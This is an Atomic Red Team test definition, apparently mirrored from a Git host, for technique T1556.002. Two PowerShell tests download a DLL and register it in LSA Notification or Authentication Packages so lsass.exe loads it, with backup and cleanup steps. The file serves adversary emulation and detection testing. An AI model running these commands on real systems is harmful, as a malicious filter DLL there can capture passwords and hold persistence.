security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1556.002/T1556.002.yaml
T
Atomic Red Team doc generator 9915e4a4a6 Generated docs from job=generate-docs branch=master [ci skip]
2024-07-17 02:53:43 +00:00

87 lines
4.7 KiB
YAML
Raw Permalink Blame History

attack_technique: T1556.002
display_name: 'Modify Authentication Process: Password Filter DLL'
atomic_tests:
- name: Install and Register Password Filter DLL
auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c
description: |
Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges.
The binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection
Source is in src folder.
This does require a reboot to see the filter loaded into lsass.exe.
It does require Administrative privileges to import the clean registry values back into LSA, it is possible you may have to manually do this after for cleanup.
supported_platforms:
- windows
input_arguments:
dll_path:
description: Path to DLL to be installed and registered
type: path
default: PathToAtomicsFolder\T1556.002\bin
dll_name:
description: Name of the Password Filter
type: string
default: AtomicRedTeamPWFilter.dll
dependency_executor_name: powershell
dependencies:
- description: |
AtomicRedTeamPWFilter.dll must exist on disk at specified location (#{dll_path}\#{dll_name})
prereq_command: |
if (Test-Path "#{dll_path}\#{dll_name}") {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"
executor:
command: |
reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
$passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
$notificationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
cleanup_command: |
reg.exe import "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
remove-item C:\Windows\System32\#{dll_name}
name: powershell
elevation_required: true
- name: Install Additional Authentication Packages
auto_generated_guid: 91580da6-bc6e-431b-8b88-ac77180005f2
description: |
lsass.exe loads all DLLs specified by the Authentication Packages REG_MULTI_SZ value.
Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges.
The binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection
Source is in src folder.
This does require a reboot to see the filter loaded into lsass.exe.
It does require Administrative privileges to import the clean registry values back into LSA, it is possible you may have to manually do this after for cleanup.
supported_platforms:
- windows
input_arguments:
dll_path:
description: Path to DLL to be installed and registered as additional authentication package
type: path
default: PathToAtomicsFolder\T1556.002\bin
dll_name:
description: Name of the Password Filter
type: string
default: AtomicRedTeamPWFilter.dll
dependency_executor_name: powershell
dependencies:
- description: |
AtomicRedTeamPWFilter.dll must exist on disk at specified location (#{dll_path}\#{dll_name})
prereq_command: |
if (Test-Path "#{dll_path}\#{dll_name}") {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"
executor:
command: |
reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
$passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$AuthenticationPackagesValues = $lsaKey.GetValue("Authentication Packages")
$AuthenticationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Authentication Packages" $AuthenticationPackagesValues
cleanup_command: |
reg.exe import "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
remove-item C:\Windows\System32\#{dll_name}
name: powershell
elevation_required: true
Reference in New Issue View Git Blame Copy Permalink